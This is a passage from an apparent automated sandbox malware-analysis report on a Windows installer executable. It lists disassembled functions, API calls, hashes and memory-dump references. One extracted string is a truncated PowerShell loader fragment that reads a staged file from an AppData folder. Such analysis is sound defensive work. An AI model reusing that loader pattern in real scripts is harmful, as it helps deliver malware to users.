                                                        • Instruction ID: 2811e774c662cae59278f25d6ecae3b2a92cb5be3fe339fd2c15133e28e6e099
                                                        • Opcode Fuzzy Hash: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                        • Instruction Fuzzy Hash: D0B01231140300BFDA214F00DF09F057B21AB90700F10C034B344380F086711035EB4D
                                                        Function 00403FB7 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • KiUserCallbackDispatcher.NTDLL(?,00403D8F), ref: 00403FC1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: CallbackDispatcherUser
                                                        • String ID:
                                                        • API String ID: 2492992576-0
                                                        • Opcode ID: 4849bdeb8750a14631e4aa7a28107b59e5a3d104c0e95e28136b5315d8d1c657
                                                        • Instruction ID: d41632a2b0a6fb41d9385d651c54052ae940fbff5a4ac867539882f0f930e1f3
                                                        • Opcode Fuzzy Hash: 4849bdeb8750a14631e4aa7a28107b59e5a3d104c0e95e28136b5315d8d1c657
                                                        • Instruction Fuzzy Hash: 92A01132800200EFCE0A8B80EF0AC0ABB22BBA0300B008038A280800308A320830EB08

                                                        Non-executed Functions

                                                        Function 00404976 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDlgItem.USER32(?,000003F9), ref: 0040498E
                                                        • GetDlgItem.USER32(?,00000408), ref: 00404999
                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 004049E3
                                                        • LoadBitmapW.USER32(0000006E), ref: 004049F6
                                                        • SetWindowLongW.USER32(?,000000FC,00404F6E), ref: 00404A0F
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A23
                                                        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404A35
                                                        • SendMessageW.USER32(?,00001109,00000002), ref: 00404A4B
                                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A57
                                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A69
                                                        • DeleteObject.GDI32(00000000), ref: 00404A6C
                                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404A97
                                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AA3
                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B39
                                                        • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404B64
                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B78
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404BA7
                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BB5
                                                        • ShowWindow.USER32(?,00000005), ref: 00404BC6
                                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CC3
                                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D81
                                                        • ImageList_Destroy.COMCTL32(?), ref: 00404D96
                                                        • GlobalFree.KERNEL32(?), ref: 00404DA6
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1F
                                                        • SendMessageW.USER32(?,00001102,?,?), ref: 00404EC8
                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED7
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF7
                                                        • ShowWindow.USER32(?,00000000), ref: 00404F45
                                                        • GetDlgItem.USER32(?,000003FE), ref: 00404F50
                                                        • ShowWindow.USER32(00000000), ref: 00404F57
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                        • String ID: $M$N
                                                        • API String ID: 1638840714-813528018
                                                        • Opcode ID: 4bb4fbd11d964890b5e614a02caf67fc8325d7349ebfcc355399b97648a18b79
                                                        • Instruction ID: 6d1688c8488b8f7448caaf142d0c57913a8900a758ff6f7bd5d79a6fae369404
                                                        • Opcode Fuzzy Hash: 4bb4fbd11d964890b5e614a02caf67fc8325d7349ebfcc355399b97648a18b79
                                                        • Instruction Fuzzy Hash: 05026DB0900209EFEB149F54DD45AAE7BB9FB84314F14813AE610BA2E1C7B99D51CF58
                                                        Function 00404430 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 269stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDlgItem.USER32(?,000003FB), ref: 0040447F
                                                        • SetWindowTextW.USER32(00000000,?), ref: 004044A9
                                                        • SHBrowseForFolderW.SHELL32(?), ref: 0040455A
                                                        • CoTaskMemFree.OLE32(00000000), ref: 00404565
                                                        • lstrcmpiW.KERNEL32(: Completed,0042D1F8,00000000,?,?), ref: 00404597
                                                        • lstrcatW.KERNEL32(?,: Completed), ref: 004045A3
                                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004045B5
                                                          • Part of subcall function 0040550D: GetDlgItemTextW.USER32(?,?,00000400,004045EC), ref: 00405520
                                                          • Part of subcall function 00405FDA: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\ro7eoySJ9q.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,75923420,00403390), ref: 0040603D
                                                          • Part of subcall function 00405FDA: CharNextW.USER32(?,?,?,00000000), ref: 0040604C
                                                          • Part of subcall function 00405FDA: CharNextW.USER32(?,"C:\Users\user\Desktop\ro7eoySJ9q.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,75923420,00403390), ref: 00406051
                                                          • Part of subcall function 00405FDA: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,75923420,00403390), ref: 00406064
                                                        • GetDiskFreeSpaceW.KERNEL32(0042B1C8,?,?,0000040F,?,0042B1C8,0042B1C8,?,00000000,0042B1C8,?,?,000003FB,?), ref: 00404676
                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404691
                                                        • SetDlgItemTextW.USER32(00000000,00000400,0042B1B8), ref: 00404717
                                                        Strings
                                                        • "$Aichmophobia=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Karbonpapirs.Fis';$Referendumets=$Aichmo, xrefs: 00404449
                                                        • C:\Users\user\AppData\Roaming\Polysulfonate\sangersken, xrefs: 00404580
                                                        • : Completed, xrefs: 00404591, 00404596, 004045A1
                                                        • A, xrefs: 00404553
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                        • String ID: "$Aichmophobia=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Karbonpapirs.Fis';$Referendumets=$Aichmo$: Completed$A$C:\Users\user\AppData\Roaming\Polysulfonate\sangersken
                                                        • API String ID: 2246997448-3199405573
                                                        • Opcode ID: d261c670d50ba5bee67266af79b7bfed0b56d12dbf2e2e6faf1bb8e2e83b33c7
                                                        • Instruction ID: bd47b41a7abdf1344e554ed8777e7d92ff40a9b1da15b07d15b44e24a67a1b52
                                                        • Opcode Fuzzy Hash: d261c670d50ba5bee67266af79b7bfed0b56d12dbf2e2e6faf1bb8e2e83b33c7
                                                        • Instruction Fuzzy Hash: 4E9183B1900209ABDB11AFA1CD85AAF77B8EF85314F10843BF601B72D1D77C8A41CB69
                                                        Function 0040206A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 123comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CoCreateInstance.OLE32(00408580,?,00000001,00408570,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
                                                        Strings
                                                        • C:\Users\user\AppData\Roaming\Polysulfonate\sangersken, xrefs: 004020F5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: CreateInstance
                                                        • String ID: C:\Users\user\AppData\Roaming\Polysulfonate\sangersken
                                                        • API String ID: 542301482-3136820510
                                                        • Opcode ID: 65ff1bb703aff5c65a52cd24046ec2ca8d8f77045bdbbb29ba0d81838cb63090
                                                        • Instruction ID: 088bd36a67d226d4641d4dbc6bd9d2ef39f197a4cbb9ab5218a9f08cb7fb8330
                                                        • Opcode Fuzzy Hash: 65ff1bb703aff5c65a52cd24046ec2ca8d8f77045bdbbb29ba0d81838cb63090
                                                        • Instruction Fuzzy Hash: 1C413075A00105AFCB00DFA4CD89EAE7BB6EF48314F20456AF906EB2D1DAB9DD41CB54
                                                        Function 00402706 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402715
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: FileFindFirst
                                                        • String ID:
                                                        • API String ID: 1974802433-0
                                                        • Opcode ID: 569660b2523abb82da564ec188e45d2166ad8df796c24877e3114b12175852e5
                                                        • Instruction ID: 7be6c913c08d15ea884a43ce55a76abbcb29d6a56581a49c1298855279991998
                                                        • Opcode Fuzzy Hash: 569660b2523abb82da564ec188e45d2166ad8df796c24877e3114b12175852e5
                                                        • Instruction Fuzzy Hash: 19F05E75A001159BDB00EBA4DA499AEB378EF05324F60417BE516E31D1DBB44A41DB29
                                                        Function 004064EC Relevance: .3, Instructions: 334COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d398b535e43ee880de6f9663a3da9d30c23bf20106ab7c53179b5f9c0eb57cb5
                                                        • Instruction ID: 531fec7b0fb0d211cf15be9fd3757e070872b4d27e2d3c8a48bb83720311cc85
                                                        • Opcode Fuzzy Hash: d398b535e43ee880de6f9663a3da9d30c23bf20106ab7c53179b5f9c0eb57cb5
                                                        • Instruction Fuzzy Hash: 01E19A71900705DFCB24CF98C890BAAB7F5FB44305F15882EE897A7291D778AAA1CF44
                                                        Function 00404132 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 207windowstringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004041D0
                                                        • GetDlgItem.USER32(?,000003E8), ref: 004041E4
                                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404201
                                                        • GetSysColor.USER32(?), ref: 00404212
                                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404220
                                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040422E
                                                        • lstrlenW.KERNEL32(?), ref: 00404233
                                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404240
                                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404255
                                                        • GetDlgItem.USER32(?,0000040A), ref: 004042AE
                                                        • SendMessageW.USER32(00000000), ref: 004042B5
                                                        • GetDlgItem.USER32(?,000003E8), ref: 004042E0
                                                        • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404323
                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00404331
                                                        • SetCursor.USER32(00000000), ref: 00404334
                                                        • ShellExecuteW.SHELL32(0000070B,open,@.C,00000000,00000000,00000001), ref: 00404349
                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00404355
                                                        • SetCursor.USER32(00000000), ref: 00404358
                                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404387
                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404399
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                        • String ID: @.C$N$open
                                                        • API String ID: 3615053054-801394694
                                                        • Opcode ID: 189af6bbec081a76bdebae2a70f4f566850949fa3ab236cd5487776f7d1f3ede
                                                        • Instruction ID: 99db4efdefbfae6e02fe30a975520441482abf578fd64f5d263331c8f1dab2c3
                                                        • Opcode Fuzzy Hash: 189af6bbec081a76bdebae2a70f4f566850949fa3ab236cd5487776f7d1f3ede
                                                        • Instruction Fuzzy Hash: 517181B1A00209FFDB119F60DD85AAA7B79FF84355F04803AFA05B61E0C778A951CF98
                                                        Function 00405A52 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 141filestringmemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • lstrcpyW.KERNEL32(00430898,NUL,?,00000000,?,?,?,00405C08,?,?,00000001,0040579D,?,00000000,000000F1,?), ref: 00405A62
                                                        • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405C08,?,?,00000001,0040579D,?,00000000,000000F1,?), ref: 00405A86
                                                        • GetShortPathNameW.KERNEL32(00000000,00430898,00000400), ref: 00405A8F
                                                          • Part of subcall function 00405934: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00405B51,00000000,[Rename]), ref: 00405944
                                                          • Part of subcall function 00405934: lstrlenA.KERNEL32(?,?,00000000,00405B51,00000000,[Rename]), ref: 00405976
                                                        • GetShortPathNameW.KERNEL32(?,00431098,00000400), ref: 00405AAC
                                                        • wsprintfA.USER32 ref: 00405ACA
                                                        • GetFileSize.KERNEL32(00000000,00000000,00431098,C0000000,00000004,00431098,?,?,?,?,?), ref: 00405B05
                                                        • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405B14
                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405B2E
                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00405B5E
                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00430498,00000000,-0000000A,0040A514,00000000,[Rename]), ref: 00405BB4
                                                        • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00405BC6
                                                        • GlobalFree.KERNEL32(00000000), ref: 00405BCD
                                                        • CloseHandle.KERNEL32(00000000), ref: 00405BD4
                                                          • Part of subcall function 004059CF: GetFileAttributesW.KERNELBASE(00000003,00402D3F,C:\Users\user\Desktop\ro7eoySJ9q.exe,80000000,00000003,?,?,?,00000000,004033FE,?), ref: 004059D3
                                                          • Part of subcall function 004059CF: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,004033FE,?), ref: 004059F5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162453771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2162438332.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162471428.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162489305.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2162633917.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
